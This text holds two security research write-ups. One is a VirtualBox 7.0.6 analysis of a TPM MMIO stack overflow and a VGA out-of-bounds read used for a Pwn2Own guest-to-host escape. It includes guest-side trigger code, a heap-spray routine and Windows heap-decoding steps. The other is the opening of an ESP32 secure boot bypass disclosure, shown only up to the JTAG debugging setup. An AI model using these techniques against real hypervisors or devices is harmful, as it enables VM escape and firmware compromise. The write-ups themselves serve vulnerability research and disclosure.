Analysis of VirtualBox CVE-2023-21987 and CVE-2023-21991

Analysis of VirtualBox CVE-2023-21987 and CVE-2023-21991

Original text by qriousec

Introduction

Hi, I am Trung (xikhud). Last month, I joined Qrious Secure team as a new member, and my first target was to find and reproduce the security bugs that @bienpnn used at the Pwn2Own Vancouver 2023 to escape the VirtualBox VM.

Since VirtualBox is an open-source software, I can just download the source code from their homepage. The version of VirtualBox at the time of the Pwn2Own competition was 7.0.6.

Exploring VirtualBox

Building VirtualBox

The very first thing I did is to build the VirtualBox and to have a debugging environment. VirtualBox’s developers have published a very detail guide to build it. My setup is below:

  • Host: Windows 10
  • Guest: Windows 10. VirtualBox will be built on this machine.
  • Guest 2 (the guest inside the VirtualBox VM): LUbuntu 18.04.3

If you are new to VirtualBox exploitation, you may wonder why I need to install a nested VM. The reason is that VirtualBox contains both kernel mode and user mode components, so I have to install it inside a VM to debug its kernel things.

The official building guide offers using VS2010 or VS2019 to build VirtualBox, but you have to use VS2019 to build the version 7.0.6.

You can use any other operating system for Guest 2. I choose LUbuntu because it is lightweight. (I have a potato computer lol).

Learning VirtualBox source code

VirtualBox source code is large, I can’t just read all of them in a short amount of time. Instead, I find blog posts about pwning VirtualBox on Google and read them. These posts not only show how to exploit VirtualBox but also describe how VirtualBox works, its architecture and stuff like that. These are the very good write-ups that I also recommend you to read if you want to start learning VirtualBox exploitation:

The VirtualBox architecture is as follow (the picture is taken from Chen Nan’s slide at HITB2021)

The simple rule I learned is that when the guest wants to emulate a device, it send a request to the host’s kernel drivers (R0) first. The host’s kernel have two choices:

  • It can handle that request
  • Or it can return 
    VINF_XXX_R3_YYYY_ZZZZ
    . This value means that it doesn’t want to handle the request and the request will be handled by the host’s user mode components (R3).

The source code for R0 and R3 is usually in the same file, the only different thing is the preprocessors.

  • #define IN_RING3
     corresponds to R3 components
  • #define IN_RING0
     corresponds to R0 components
  • #define IN_RC
    : I don’t know what this is, maybe someone knows can tell me …

For example, let’s look at the code in the 

DevTpm.cpp
 file:

In the image above, when the R0 component receives this request, it will pass to R3 component. The return code (

rc
) is 
VINF_IOM_R3_MMIO_WRITE
. According to the source code comment, it is “Reason for leaving RZ: MMIO write”. There are other similar values: 
VINF_IOM_R3_MMIO_READ
VINF_IOM_R3_IOPORT_WRITE
VINF_IOM_R3_IOPORT_READ
, …

If you want to know more detail about VirtualBox architechture, I suggest you to read the slide by Chen Nan. You can also watch his video here.

After having a basic understanding about VirtualBox, the next thing I did is to find some attack vectors. Usually, with VirtualBox, the attack scenario will be an untrusted code running within the guest machine. It will communicate with the host to compromise it. There are two methods a guest OS can talk to the host:

  • Using memory mapped I/O
  • Using port I/O

These are usually the entry points of an attack, so I look at them first when auditing.

The memory mapped region can be created by these functions:

  • PDMDevHlpMmioCreateAndMap
  • PDMDevHlpMmioCreateExAndMap
  • ...

The IO port can be created by:

  • PDMDevHlpIoPortCreateFlagsAndMap
  • PDMDevHlpPCIIORegionCreateIo
  • PDMDevHlpPCIIORegionCreateMmio2Ex
  • ...

With memory mapped, we can use the 

mov
 or similar instructions to communicate with the host. Meanwhile, we use 
in
out
 instruction when we work with IO port.

Now I have more understanding about VirtualBox, I can start to look for bugs now. To reduce the time, @bienpnn gave me 2 hints:

  • The OOB write bug is in the TPM components
  • The OOB read bug is in the VGA components

Knowing that, I open the source code and read files in 

src/VBox/Devices/Security
 and 
src/VBox/Devices/Graphics
 folders.

The OOB write bug

At Pwn2Own, the TPM 2.0 is enabled. It is required to run Windows 11 inside VirtualBox. You will have to enable it manually in the VirtualBox GUI, if you don’t, then the exploit here won’t work.

The TPM module is initialized by the two functions 

tpmR3Construct
 (R3) and 
tpmRZConstruct
 (R0). Both functions register 
tpmMmioRead
 and 
tpmMmioWrite
 to handle read/write to memory mapped region.

    rc = PDMDevHlpMmioCreateAndMap(pDevIns, pThis->GCPhysMmio, TPM_MMIO_SIZE, tpmMmioWrite, tpmMmioRead,
                                   IOMMMIO_FLAGS_READ_PASSTHRU | IOMMMIO_FLAGS_WRITE_PASSTHRU,
                                   "TPM MMIO", &pThis->hMmio);

The memory region is at 
pThis->GCPhysMmio
, which is 
0xfed40000
 by default.
To confirm the communication works as expected, I put a (R0) breakpoint at 
VBoxDDR0!tpmMmioWrite
 and write a small C code to run inside the VirtualBox.
void *map_mmio(void *where, size_t length)
{
    int fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (fd == -1) { /* error */ }
    void *addr = mmap(NULL, length, PROT_READ | PROT_WRITE, MAP_SHARED, fd, (off_t)where);
    if (addr == NULL) { /* error */ }
    return addr;
}

int main()
{
    volatile uint8_t* mmio_tpm = (uint8_t *)map_mmio((void *)0xfed40000, 0x5000);
    mmio_tpm[0x200] = 0xFF;
    return 0;
}

The breakpoint hit! It works. This is the signature of the 

tpmMmioWrite
 function:

static DECLCALLBACK(VBOXSTRICTRC) tpmMmioWrite(PPDMDEVINS pDevIns, void *pvUser, RTGCPHYS off, void const *pv, unsigned cb);

At the time the breakpoint hit, 

off
 is 
0x200
 (which is the offset from the start of the memory mapped buffer), 
cb
 is the number of byte to read, in this case it is 
0x1
 since we only write 1 byte, 
pv
 is the host buffer contains the values supplied by the guest OS, in this case it contains 
0xFF
 only. If we want to write more bytes, we can write it in C like this:

*(uint32_t*)(mmio_tpm + 0x200) = 0xFFAABBCC;

In assembly form, it will be something like this:

mov dword ptr [rdx], 0xFFAABBCC 

In this case, 

cb
 will be 
0x4
.

The 

tpmMmioWrite
 function looks fine, after confirming the is no bug in it, I look at 
tpmMmioRead
.

static DECLCALLBACK(VBOXSTRICTRC) tpmMmioRead(PPDMDEVINS pDevIns, void *pvUser, RTGCPHYS off, void *pv, unsigned cb)
{
    /* truncated */
    uint64_t u64;
    /* truncated */
        rc = tpmMmioFifoRead(pDevIns, pThis, pLoc, bLoc, uReg, &u64, cb);
    /* truncated */
    return rc;
}

static VBOXSTRICTRC tpmMmioFifoRead(PPDMDEVINS pDevIns, PDEVTPM pThis, PDEVTPMLOCALITY pLoc,
                                    uint8_t bLoc, uint32_t uReg, uint64_t *pu64, size_t cb)
{
    /* ... */
    /* Special path for the data buffer. */
    if (   (   (   uReg >= TPM_FIFO_LOCALITY_REG_DATA_FIFO
               && uReg < TPM_FIFO_LOCALITY_REG_DATA_FIFO + sizeof(uint32_t))
            || (   uReg >= TPM_FIFO_LOCALITY_REG_XDATA_FIFO
                && uReg < TPM_FIFO_LOCALITY_REG_XDATA_FIFO + sizeof(uint32_t)))
        && bLoc == pThis->bLoc
        && pThis->enmState == DEVTPMSTATE_CMD_COMPLETION)
    {
        if (pThis->offCmdResp <= pThis->cbCmdResp - cb)
        {
            memcpy(pu64, &pThis->abCmdResp[pThis->offCmdResp], cb);
            pThis->offCmdResp += (uint32_t)cb;
        }
        else
            memset(pu64, 0xff, cb);
        return VINF_SUCCESS;
    }
}

You can see that there is a branch of code that does a 

memcpy
 into the 
u64
, which is a stack variable of 
tpmMmioRead
 function. To be able to reach this branch, 
uReg
bLoc
 and 
pThis->enmState
 must have appropriate values. But don’t worry because we can control all of them, we can also control 
pThis->offCmdResp
 and 
pThis->abCmdResp
. There is no check to make sure 
cb &lt;= sizeof(uint64_t)
, so maybe there is a stack buffer overflow here? Now I have to find a way to make 
cb
 larger than 
sizeof(uint64_t)
 (8). I google and found that some AVX-512 instructions can read up to 512 bits (64 bytes) memory. Since my CPU doesn’t support AVX-512, I try AVX2 instead:

__m256 z = _mm256_load_ps((const float*)off);

Indeed, it works! 

cb
 is now 
0x20
 and I can overwrite 0x18 bytes after 
u64
 variable. But the is a problem: 
u64
 is behind the return address of 
VBoxDDR0!tpmMmioRead
. Let’s look at the stack when RIP is at the very first instruction of 
VBoxDDR0!tpmMmioRead
:

2: kd> dq @rsp
ffffbb80`814920a8  fffff804`d2432993 ffff8901`0ecc0000
ffffbb80`814920b8  000fffff`fffff000 ffff8901`0edc6760
ffffbb80`814920c8  fffff804`d243418b 00000000`00000020
ffffbb80`814920d8  fffff804`d2458b1d ffffe289`26bf7000
ffffbb80`814920e8  00000000`00000020 ffff8901`0ede4000
ffffbb80`814920f8  00000000`00000080 ffff8901`0ecc0000
ffffbb80`81492108  fffff804`d243313f ffffe289`26b87188
ffffbb80`81492118  fffff804`d2451c8b 00000000`fed40080

Remember that the return address is at 

0xffffbb80814920a8
. Now let’s run until RIP is at 
call VBoxDDR0!tpmMmioFifoRead
:

2: kd> dq @rsp
ffffbb80`81492060  ffff8901`0ecc0000 00000000`00000000
ffffbb80`81492070  00000000`00000060 fffff804`d253ba1b
ffffbb80`81492080  00000000`00000080 ffffbb80`814920b0 <-- pu64
ffffbb80`81492090  00000000`00000020 00000000`00000018
ffffbb80`814920a0  ffff8901`0ede4140 fffff804`d2432993 <-- R.A
ffffbb80`814920b0  ffff8901`0ecc0000 ffffe289`26b87188
ffffbb80`814920c0  00000000`00000080 fffff804`d243418b
ffffbb80`814920d0  00000000`00000020 fffff804`d2458b1d

Based on the x64 Windows calling convention, the 5th argument is at 

[rsp+0x28]
, so the address of 
u64
 is 
0xffffbb80814920b0
, which is behind the return address (
0xffffbb80814920a8
). Why does this happen? I don’t really know, but I guess this is some kind of compiler optimization. Let’s check 
tpmMmioRead
 in IDA:

unsigned __int64 pu64; // [rsp+50h] [rbp+8h] BYREF

The assembly code:

.text:000000014002BA10 000   mov     [rsp+10h], rbx
.text:000000014002BA15 000   mov     [rsp+18h], rsi
.text:000000014002BA1A 000   push    rdi
.text:000000014002BA1B 008   sub     rsp, 40h
.text:000000014002BA1F 048   mov     rdx, [rcx+10h]  ; pThis

pu64
 is at 
[rsp+0x50]
, but the function only allocate 0x48 bytes for the stack. Clearly, 
pu64
 is outside of the stack frame range. So in which function stack frame does this variable belong to? Well, it is right next to the return address, so it is in the shadow space. Turned out that, the shadow space is used to make debugging easier. But we are using the “Release” build, so it will use the shadow space as if it is a normal space. We can overwrite 0x18 bytes after the 
u64
 variable. Unfortunately, there is no data after 
u64
 so we can’t do anything. I’m stuck now. Maybe if my CPU supports AVX-512, I can do something? Until now, @bienpnn told me that there is an instruction which can read up to 512 bytes. It is 
fxrstor
, which is used to restore x87 FPU, MMX, XMM, and MXCSR state. Knowing this, I tried this code:

_fxrstor64((void*)off);

And then, VirtualBox.exe crashed! That’s good. But wait, why does it crash without first hitting the breakpoint at 

VBoxDDR0!tpmMmioRead
? Turned out that all the request with 
cb >= 0x80
 will be handled by R3 code. This is the comment in 
src\VBox\VMM\VMMAll\IOMAllMmioNew.cpp
:

/*
 * If someone is doing FXSAVE, FXRSTOR, XSAVE, XRSTOR or other stuff dealing with
 * large amounts of data, just go to ring-3 where we don't need to deal with partial
 * successes.  No chance any of these will be problematic read-modify-write stuff.
 *
 * Also drop back if the ring-0 registration entry isn't actually used.
 */

Let’s trigger this bug again. But this time we will set a breakpoint at 

VBoxDD!tpmMmioRead
 instead. And now I can see a stack buffer overflow.

Really nice. Now we have RIP controlled, but don’t know where to jump. We need a leak.

The OOB read bug

The OOB read bug is inside 

VGA
 module. There are a lot of files belong to this module, but I choose to read 
DevVGA.cpp
 first, since the name looks like the main file of VGA module. I look at the 2 construction functions to see which IO port or memory mapped is used. I found that the 
vgaMmioRead
 will handle the MMIO request, it will then call 
vga_mem_readb
. And inside this function, I found the code below (we can control 
addr
):

pThis->latch = !pThis->svga.fEnabled            ? ((uint32_t *)pThisCC->pbVRam)[addr]
             : addr < VMSVGA_VGA_FB_BACKUP_SIZE ? ((uint32_t *)pThisCC->svga.pbVgaFrameBufferR3)[addr] : UINT32_MAX;

pThis->svga.fEnabled
 is 
true
 so we only care about this line:

addr < VMSVGA_VGA_FB_BACKUP_SIZE ? ((uint32_t *)pThisCC->svga.pbVgaFrameBufferR3)[addr] : UINT32_MAX;

VMSVGA_VGA_FB_BACKUP_SIZE
 is the size of 
pThisCC->svga.pbVgaFrameBufferR3
. Maybe you can see what’s wrong here.

((uint32_t *)pThisCC->svga.pbVgaFrameBufferR3)[addr]

*(uint32_t *)(pThisCC->svga.pbVgaFrameBufferR3 + sizeof(uint32_t) * addr)
// note that the type of pThisCC->svga.pbVgaFrameBufferR3 is uint8_t[]

he code checks if 

addr &lt; VMSVGA_VGA_FB_BACKUP_SIZE
, but actually uses 
4 * addr
 for indexing. It means that we have an OOB read here. Untill now, I thought that it will be easy because with a leak and a stack buffer overflow, I would easily do a ROP chain. But I regret soon when I see that the heap layout is not static, it changes everytime I open a new VirtualBox process. The reason for this is because VirtualBox is a very complex software, so heap allocations are made everywhere, which changes the shape of the heap.

Exploitation

Now I need a reliable way to have a leak. For this, I will use heap spraying technique. So my plan is to poison the heap with a lot of objects that I control, and (hopefully) some of the objects will be right behind the 

pbVgaFrameBufferR3
 buffer so that I can use the OOB read to leak information. sauercl0ud team had already written a nice blog post about exploiting VirtualBox. Inside the post, they sprayed the heap with 
HGCMMsgCall
 objects, I will just use 
HGCMMsgCall
 too, because why not 😀 ?

What is HGCM?

HGCM is an abbreviation for “Host/Guest Communication Manager”. This is the module used for communication between the host and the guest. For example, they need to talk to each other in order to implement the “Shared Clipboard”, “Shared Folder”, “Drag and drop” services.

Here’s how it works. The guest inside VirtualBox will have to install additional drivers, a.k.a the guest additions. When the guest wants to use one of the service above, it will send a message to the host through IO port, the message is represented by the 

HGCMMsgCall
 struct.

0:035> dt VBoxC!HGCMMsgCall
   +0x000 __VFN_table : Ptr64 
   +0x008 m_cRefs          : Int4B
   +0x00c m_enmObjType     : HGCMOBJ_TYPE
   +0x010 m_u32Version     : Uint4B
   +0x014 m_u32Msg         : Uint4B
   +0x018 m_pThread        : Ptr64 HGCMThread
   +0x020 m_pfnCallback    : Ptr64     int 
   +0x028 m_pNext          : Ptr64 HGCMMsgCore
   +0x030 m_pPrev          : Ptr64 HGCMMsgCore
   +0x038 m_fu32Flags      : Uint4B
   +0x03c m_rcSend         : Int4B
   +0x040 pCmd             : Ptr64 VBOXHGCMCMD
   +0x048 pHGCMPort        : Ptr64 PDMIHGCMPORT
   +0x050 pcCounter        : Ptr64 Uint4B
   +0x058 u32ClientId      : Uint4B
   +0x05c u32Function      : Uint4B
   +0x060 cParms           : Uint4B
   +0x068 paParms          : Ptr64 VBOXHGCMSVCPARM
   +0x070 tsArrival        : Uint8B

This object is perfect because:

  • It has a 
    vtable
     pointer -> We can leak a library address
  • It has 
    m_pNext
     and 
    m_pPrev
    , which points to next and previous 
    HGCMMsgCall
     in a doubly linked list -> Also good, can be used to leak heap address.

Now I will spray the heap with a lot of 

HGCMMsgCall
. This code is just copied from Sauercl0ud blog:

void spray()
{
    int rc;
    for (int i = 0; i < 64; ++i)
    {
        int32_t clientId;
        rc = hgcm_connect("VBoxGuestPropSvc", &clientId);
        for (int j = 0; j < 16 - 1; ++j)
        {
            char pattern[0x70];
            char out[2];
            rc = wait_prop(clientId, pattern, strlen(pattern) + 1, out, sizeof(out)); // call VBoxGuestPropSvc HGCM service, this will allocate a HGCMMsgCall
        }
    }
}

After some observation, I realize that the 

vtable
 is usually 
0x7F??????AD90
. Only the 
?
 part is randomized, I will use this information to identify a 
HGCMMsgCall
 on the heap. My approach is simple: I just keep reading a qword (8 bytes) each time, called 
X
. I will then check if 
(X &amp; 0xFFFF) == 0xAD90
 and 
(X &gt;&gt; 40) == 0x7F
. If this is true, we likely to reach a 
HGCMMsgCall
, and X is the 
vtable
 pointer. To leak heap address, I will do like this (this idea is also taken from Sauercl0ud blog):

  • Find a 
    HGCMMsgCall
     on the heap. Let’s call this object 
    A
     and let’s call 
    a
     the offset from the 
    pbVgaFrameBufferR3
     buffer to this object.
  • Find another 
    HGCMMsgCall
    B
     and 
    b
     are the same as above, and 
    b &gt; a
    .
  • If 
    A-&gt;m_pNext - B-&gt;m_pPrev == b - a
    , then it’s likely that 
    A-&gt;m_pNext
     is the address of 
    B
    . It means that 
    A-&gt;m_pNext - b
     is the address of 
    pbVgaFrameBufferR3
     buffer.

Actually I don’t need a heap leak to make a ROP chain, only a DLL leak is enough. But I want to show you this method so that you can make a longer ROP chain in case you need it.

Now I have enough information to write an exploit.

Testing out the exploitation idea

I implement the idea above, and run the exploit for 20 times and not a single time success. That’s 0% of success rate, very bad. Most of the time, VirtualBox just crashes. I attached a debugger and ran the exploit again, the crash happened when trying to read an address that had not been mapped. Turned out that I could read up to 

0x180000
 bytes (1.5MB) after the 
pbVgaFrameBufferR3
 buffer, but most of the time there is only about ~ 
0xC0000
 bytes that had been mapped. Another crash I found is when the exploit was trying to read an address inside a guard page. Another problem I had is that the exploit run really slow, because the OOB bug only lets me read 1 byte at a time. I need to improve the speed of the exploit as well.

Parsing heap header to avoid unmmaped pages and increase speed

Until now, I have a new idea: parsing the heap chunk headers on the heap to gain more information. First thing I want to do is to read some information about a chunk, for example, the size of the chunk, is it freed or in used? If I can do this, maybe I will be able to skip some unnecessary chunks. To make this idea come true, I have to learn some Windows heap internal. I recommend you to read these:

Basically, a heap chunk is represented by 

_HEAP_ENTRY
 structure:

0:035> dt _HEAP_ENTRY
ntdll!_HEAP_ENTRY
    ...
   +0x008 Size             : Uint2B
   +0x00a Flags            : UChar
    ...
   +0x00c PreviousSize     : Uint2B
    ...

Size
 is the size of the chunk (include the header itself), 
PreviousSize
 is the size of the previous chunk (in memory), and 
Flags
 contains extra information about a chunk, for example: is it free or in used.

Actually 

Size
 (and 
PreviousSize
) is the size of a chunk in blocks, not in bytes. 1 block is 16 bytes in length.

Parsing heap header is easy. 16 bytes after 

pbVgaFrameBufferR3
 is the chunk header of a chunk, so I can read it, get the 
Size
 and just do it again … But there is a problem: the chunk header is encoded, it is xorred with 
_HEAP->Encoding
. I will give you an example.

0:042> !heap -i 26855e40000             
Heap context set to the heap 0x0000026855e40000
0:042> db 0000026859f1f010 L0x10
00000268`59f1f010  0c 00 02 02 2e 2e 00 00-dd e0 1a 38 cd be b2 10  ...........8....
0:042> !heap -i 0000026859f1f010 
Detailed information for block entry 0000026859f1f010
Assumed heap       : 0x0000026855e40000 (Use !heap -i NewHeapHandle to change)
Header content     : 0x381AE0DD 0x10B2BECD (decoded : 0x08010801 0x10B28201)
Owning segment     : 0x00000268593f0000 (offset b2)
Block flags        : 0x1 (busy )
Total block size   : 0x801 units (0x8010 bytes)
Requested size     : 0x8000 bytes (unused 0x10 bytes)
Previous block size: 0x8201 units (0x82010 bytes)
Block CRC          : OK - 0x8  
Previous block     : 0x0000026859e9d000
Next block         : 0x0000026859f27020

The output of 

!heap -i
 said that the header content is 
0x381AE0DD 0x10B2BECD
, but after decoded it is 
0x08010801 0x10B28201
. Let’s confirm this

0:042> db 0000026859f1f010 L0x10
00000268`59f1f010  0c 00 02 02 2e 2e 00 00-dd e0 1a 38 cd be b2 10  ...........8....
0:042> dt _HEAP
ntdll!_HEAP
   +0x000 Segment          : _HEAP_SEGMENT
    ...
   +0x080 Encoding         : _HEAP_ENTRY // <-- The key to decode
    ...
0:042> dq 26855e40000+0x80 L2
00000268`55e40080  00000000`00000000 00003ccc`301be8dc

So the key is 

0x00003ccc301be8dc
0x00003ccc301be8dc ^ 0x10b2becd381ae0dd = 0x10b2820108010801
, which is exactly what shown in 
!heap -i
 command.

So to parse a chunk header, we need to leak the 

_HEAP->Encoding
. I can’t not directly leak it but I have an idea to calculate it. 
pbVgaFrameBufferR3
 has the size of 
0x80010
 bytes (include the header), so the chunk right behind it (let’s call this chunk 
A
) must have 
PreviousSize
 equals to 
0x8001
. Knowing this, I can calculate 2 bytes key to decode 
PreviousSize
.

KeyToDecodePreviousSize = A->PreviousSize ^ 0x8001

Next, I find another chunk after chunk 

A
, let’s call this chunk 
B
B
 is likely to be a valid chunk if:

(B->PreviousSize ^ KeyToDecodePreviousSize) << 4 == Distance between A and B

B->PreviousSize ^ KeyToDecodePreviousSize
 is also the value of 
A->Size ^ KeyToDecodeSize
, so:

KeyToDecodeSize = B->PreviousSize ^ KeyToDecodePreviousSize ^ A->Size

Now I am able to decode 

Size
 and 
PreviousSize
. What about the 
Flags
? I don’t know a good way to decode it, so I just run VirtualBox multiple times and observe that most of the time chunk 
A
 is in used. So if any other chunk has the LSB bit of 
Flags
 equals to the LSB bit of 
A-&gt;Flags
, then it is also in used and vice versa. With this informaton, I can walk the heap easily, the algorithm looks like this:

uint32_t curOffset = 0x80000;
while (curOffset < 0x200000) { // 0x200000 is the maximum we can touch
    HEAP_ENTRY hE;
    readHeapEntry(curOffset, &hE);
    if (isInUsed(&hE))
        findSprayedObjects(curOffset, &hE);
    curOffset += ((hE.Size ^ KeyToDecodeSize) << 4); // 1 block is 16 bytes
}

Now my exploit runs a lot faster, also the success rate is increased a little. But sometime the exploit still crashed VirtualBox. I attach Windbg and see that it was trying to access a guard page, and this guard page is inside an in-used chunk. After a few days of researching, I finally knew that chunk was a 

UserBlocks
.

How does LFH work and what is a 
UserBlocks
?

Quoted from Microsoft:

Heap fragmentation is a state in which available memory is broken into small, noncontiguous blocks. When a heap is fragmented, memory allocation can fail even when the total available memory in the heap is enough to satisfy a request, because no single block of memory is large enough. The low-fragmentation heap (LFH) helps to reduce heap fragmentation. The LFH is not a separate heap. Instead, it is a policy that applications can enable for their heaps. When the LFH is enabled, the system allocates memory in certain predetermined sizes

When an application makes more than 17 allocations of the same size, the LFH will be turned on (for that size only). We spray a lot of objects (more than 17), so they will all be served by the LFH. Basically this is how LFH works:

  • A big chunk will be allocated, this is a 
    UserBlocks
     struct. A 
    UserBlocks
     contains some metadata and a lot of small chunks.
  • Any heap allocation after that will return a (freed) small chunk in the 
    UserBlocks
    .

UserBlocks
 is represented by a 
_HEAP_USERDATA_HEADER
 struct:

0:042> dt _HEAP_USERDATA_HEADER
ntdll!_HEAP_USERDATA_HEADER
   +0x000 SFreeListEntry   : _SINGLE_LIST_ENTRY
   +0x000 SubSegment       : Ptr64 _HEAP_SUBSEGMENT
   +0x008 Reserved         : Ptr64 Void
   +0x010 SizeIndexAndPadding : Uint4B
   +0x010 SizeIndex        : UChar
   +0x011 GuardPagePresent : UChar
   +0x012 PaddingBytes     : Uint2B
   +0x014 Signature        : Uint4B
   +0x018 EncodedOffsets   : _HEAP_USERDATA_OFFSETS
   +0x020 BusyBitmap       : _RTL_BITMAP_EX
   +0x030 BitmapData       : [1] Uint8B

There is 2 important things to note here:

  • The 
    _HEAP_USERDATA_HEADER
     is not encoded like the 
    HEAP_ENTRY
    . A 
    UserBlocks
     is also a regullar chunk, so it is in the “user data” part of another 
    HEAP_ENTRY
    .
  • Signature
     is always 
    0xF0E0D0C0
    , so we can easily find it in the heap.
  • GuardPagePresent
    : if this is non zero, the 
    UserBlocks
     has a page guard at the end, so we can skip 
    0x1000
     bytes at the end, preventing crashes.
  • BusyBitmap
     contains the address of 
    BitmapData
    . This can be used as a reliable way to leak heap address too

Knowing that all the 

HGCMMsgCall
 sprayed by us will be served by LFH, I will only find them in a 
UserBlocks
. This makes the exploit run a lot of faster than the first exploit I made.

More success rate, more speed

I also noted that each time I want to send a HGCM message, I have to create a 

HGCMClient
. Since there are many 
HGCMClient
s being allocated when spraying, I also look for their 
vtable
 pointer.

One more thing is that every chunk address will have to be the multiple of 

0x10
, so I only read qwords at these locations to find 
vtable
. This will also increase the speed of my exploit.

Conclusion

I would like to give a special thanks to my mentor @bienpnn, who was actively helping me throughout the project. This is my first time exploiting a real Windows software so it is really fun. After this project, I learned more about Windows heap internal, how a hypervisor works, how to debug Windows kernel and a ton of other knowledge. I hope this post can help you if you are about to target VirtualBox, and see you in another blog post!

Pwn the ESP32 Secure Boot

Pwn the ESP32 Secure Boot

Original text by  LimitedResults

In this post, I focus on the ESP32 Secure Boot and I disclose a full exploit to bypass it during the boot-up, using low-cost fault injection technique.

Espressif and I decided to go to Responsible Disclosure for this vulnerability (CVE-2019-15894).

The Secure Boot

Secure boot is the guardian of the firmware authenticity stored into the external SPI Flash memory.

It is easy for an attacker to reprogram the content of the SPI Flash memory, then to run its malicious firmware on the ESP32. The secure boot is here to protect against this kind of firmware modification.

It creates a chain of trust from the BootROM to the bootloader until the application firmware. It guarantees the code running on the device is genuine and cannot be modified without signing the binaries (using a secret key). The device will not execute untrusted code otherwise.

ESP32 Secure boot details

Espressif provides a complete online documentation here, dedicated to this feature.

How it works?

Secure boot is normally set during the production (at the factory), considered as a secureenvironment.

During the Production

Secure boot key (SBK) into e-Fuses

The ESP32 has a One Time Programmable (OTP) memory, based on four blocks of 256 e-Fuses (total of 1024 bits).

The Secure Boot Key (SBK) is burned into the eFuses BLK2 (256 bits) during the production. This key is then used by AES-256 ECB mode by the BootROM to verify the bootloader. According to Espressif, the SBK cannot be readout or modify (the software cannot access the BLK2 block due to the Read/Write Protection eFuse). 

This key has to be kept confidential to be sure an attacker cannot create a new bootloader image. It is also a good idea to have a unique key per device, to reduce the scalability if one day, the SBK is leaked or recovered.

ECDSA key Pair

During the production phase, the vendor will also create an ECDSA key pair ( private key and public key).

The private key has to be kept confidential. The public key will be included at the end of the bootloader image. This key will be in charge to verify the signature of the app image.

The digest

At the address 0x00000000 in the SPI flash layout, a 192-bytes digest has to be flashed. The output digest is 192 bytes of data is composed by 128 bytes of random, followed by the 64 bytes SHA-512 digest computed such as:

Digest = SHA-512(AES-256((bootloader.bin + ECDSA publ. key), SBK))

On the field now

During the boot-up, the secure boot process is the following:

Reset vector > ROM starts > ROM Loads and verifies Bootloader image (using SBK in OTP) > Bootloader is running > Bootloader loads and verifies App image > App image is running

The BootROM verification

After the reset, the CPU0 (PRO_CPU) executes the BootROM code (stage 0), which will be in charge to verify the bootloader signature. Then, the bootloader image (present at 0x1000 in the flash memory layout) is loaded into SRAM and the BootROM verifies the bootloader signature. If result is ok, the CPU0 then executes the bootloader (stage 1).

About The ECDSA verification

Micro-ECC (uECC) library is used to implement the ECDSA verification in the bootloader image, to verify the app image signature (stage 2).

I noticed this previous vulnerability CVE-2018-18558. It was fixed in esp-idf v3.1.

Focus on Stage 0

For an attacker, it is obviously more interesting to focus on the Bootloader verification done by the BootROM (not on the further stages).

The Software Setup

Compile and run a signed Application

A simple main.c like that should be enough as a test application:

void app_main()
 {
     while(1)
     {
     printf("Hello from SEC boot K1!\n");
     vTaskDelay(1000 / portTICK_PERIOD_MS);
     }
 }

To compile, I enable the (reflashable) secure boot via make menuconfig. That will automatically compute and insert the digest into the signed bootloader file. This config will generate a known Secure Boot Key. (I can reflash a different signed bootloader in the future). Security stays the same.

make menuconfig

After the end of the compilation, I finally flash the bootloader+digest file at 0x0 in the flash layout, the app image at 0x10000 and the table partition at 0x8000 using esptool.py.

Setting the Secure Boot

I enable the secure boot feature on a new ESP32 board manually, using these commands:

## Burn the secure boot key into BLK2
$ espefuse.py burn_key secure_boot ./hello_world_k1/secure-bootloader-key-256.bin
## Burn the ABS_DONE fuse to activate the sec boot
$ espefuse.py burn_efuse ABS_DONE_0

After the reset, the E-fuses map can be read using espefuse.py tool:

eFuses summary

Secure boot is enabled (ABS_DONE_0=1) and the secure boot key (BLK2) cannot be readout anymore. CONSOLE_DEBUG_DISABLE was already burned when I received the board.

The ESP32 will now authenticate the bootloader after each reset, the software then verifies the app and the code is running:

...
I (487) cpu_start: Pro cpu start user code                                      
I (169) cpu_start: Starting scheduler on PRO CPU.                               
Hello from SEC boot K1!
Hello from SEC boot K1!
Hello from SEC boot K1!
...

Note: Some advised people will probably notice I do not burn the JTAG_DISABLE eFuse…intentionally 😉

Compile and run the unsigned Application

To set my attack scenario, I create a new project with this straightforward hello_world C code in the main function:

void app_main()
 {
     while(1)
     {
     printf("Sec boot pwned by LimitedResults!\n");
     vTaskDelay(1000 / portTICK_PERIOD_MS);
     }
 }

I compile then I flash the unsigned bootloader and the unsigned app image. As expected, the device is bricked displaying an error message on the UART:

ets Jun  8 2016 00:22:57
rst:0x10 (RTCWDT_RTC_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
 configsip: 0, SPIWP:0xee
 clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
 mode:DIO, clock div:2
 load:0x3fff0018,len:4
 load:0x3fff001c,len:8708
 load:0x40078000,len:17352
 load:0x40080400,len:6680
 secure boot check fail
 ets_main.c 371
...(infinite loop)

Exactly what I wanted. The secure boot fails once it checks the unsigned bootloader. 

The attack is simple here. The goal is to find a way to force the ESP32 to execute this unsigned bootloader (then my unsigned app) on the ESP32.
Let’s reverse now.

The JTAG way

You remember I did not burn the JTAG fuse? It is great because I can now use this debug interface to identify the secure boot related functions and see how I can prepare an exploit.

OpenOCD + FT2232h board 

I download openOCD for ESP32 here and extract it:

$ wget https://github.com/espressif/openocd-esp32/releases/download/v0.10.0-esp32-20190313/openocd-esp32-linux64-0.10.0-esp32-20190313.tar.gz
$ tar -xvf openocd-esp32-linux64-0.10.0-esp32-20190313.tar.gz
$ cd openocd-esp32

Full Debug Setup

I need an interface to connect via JTAG to the ESP32. The FT2232h board is perfect, it’s my Swiss army knife. The connections between the two boards are below:

FT2232H_ADBUS1_TDI <-> GPIO12 (MTDI)
FT2232H_ADBUS0_TCK <-> GPIO13 (MTCK)
FT2232H_ADBUS3_TMS <-> GPIO14 (MTMS)
FT2232H_ADBUS2_TDO <-> GPIO15 (MTDO)
FT2232H_GND        <-> ESP32_GND

JTAG setup. ESP32 on the left, FT2232h board on the right.

GDB session

Then, openOCD and GDB are launched in two distinctive shells:

# shell 1
$ ./bin/openocd -s share/openocd/scripts -f interface/ftdi/ft2232h_bb.cfg -f board/esp-wroom-32.cfg -c "init; reset halt"
# shell 2
$ xtensa-esp32-elf-gdb

I also add a minicom shell to UART0. At the end, it’s just a normal GDB debug session:

A shell for UART, a shell for GDB, a shell for openOCD and my custom config for the ft2232h breakout board

